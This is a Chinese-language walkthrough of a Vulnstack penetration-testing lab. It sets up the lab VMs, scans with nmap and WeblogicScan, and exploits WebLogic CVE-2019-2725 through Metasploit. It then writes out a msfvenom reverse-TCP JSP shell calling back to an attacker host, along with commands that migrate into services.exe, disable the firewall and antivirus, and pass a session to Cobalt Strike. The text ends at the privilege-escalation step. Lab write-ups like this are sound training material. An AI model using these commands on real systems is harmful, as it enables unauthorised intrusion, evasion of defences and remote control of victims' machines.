靶场下载来自:
http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
靶场统一登录密码:1qaz@WSX
按大佬的说法是
环境需要模拟内网和外网两个网段,PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网
这是pc的配置
这是DC的配置
web的配置和pc的配置一样就行,就是两台网络适配器
将新增的网卡VMnet2,子网ip调成10段。
这是官网的环境说明
可以看到dmz网段,也就是外网网段是写成了192.168.111.1/24
我们最后还要用ipconfig查看各主机的ip
WEB主机
PC主机
DC主机
以及我们的kali
WEB主机进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin
以管理员身份运行strartWebLogic.cmd后环境就搭建好了
首先用nmap扫描一下目标IP
nmap -sS -sV -Pn -T4 192.168.111.80
-sS 使用TCP的SYN进行扫描,很少在目标主机上留下扫描日志
-sV 探测服务/版本信息
-Pn 将所有主机视为在在线,跳过主机发现,可以穿过防火墙
-T4 代表扫描时间间隔
nmap的使用见:
nmap详细使用教程_nmap使用教程-CSDN博客
我们可以百度一下开放这些端口可能会存在些什么代表性的漏洞
445端口开放意味着存在smb服务,可能存在ms17_010永恒之蓝漏洞。
7001端口说明目标IP存在weblogic服务可能存在反序列化,SSRF,任意文件上传,后台路径泄露
开放139端口,就存在Samba服务,就可能存在爆破/未授权访问/远程命令执行漏洞
放1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。
开放3389端口,就存在远程桌面。
常见的端口及可能存在的漏洞参考文章:
https://www.cnblogs.com/zcg-cpdd/p/14630766.html
在此之前我们还需要下weblogicscan
weblogicscan工具地址:
1.https://gitee.com/opticfiber/WeblogicScan/repository/archive/master.zip
2.https://github.com/dr0op/WeblogicScan.git
执行命令
python WeblogicScan.py -u ip -p 7001
存在两个CVE漏洞,CVE-2017-3506、CVE-2019-2725
存在后台路径,还存在一个SSRF漏洞
SSRF漏洞存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp
知道了存在CVE-2019-2725的漏洞,使用msf查看一下漏洞利用脚本
msfconsole
search CVE-2019-2725
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
在此之前我们还需要下载一个java反序列化工具
下载链接见:
Releases · shack2/javaserializetools · GitHub
下第一个就行
java -jar 文件 即可运行
执行
msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.136 LPORT=4444 -f jsp > /root/test.jsp
把shell写到控制台images目录中
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp 目录上传木马
msf开启监听,访问shell.jsp,获得回话,administrator权限
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
msf操作教程见:
【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客
我们用shell systeminfo命令
用chcp 65001解决出现的乱码
我们用ps命令查看进程
getpid查看进程号,得到
进程迁移到system权限进程services
百度了一下,更多见:Services.exe是什么?如何辨别services.exe是否为病毒?-太平洋IT百科
migrate 512,进程迁移后是system权限
netsh advfirewall set allprofiles state off 关闭防火墙
run killav 关闭杀软
内网
打开cs创建一个监听器
这里需要注意的就是cs需要java11
我们在cmd界面用java -version可以查看此时的java版本
创建监听器
执行命令
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.235.129
set lport 8888
set session 2
run
在cs中进行提权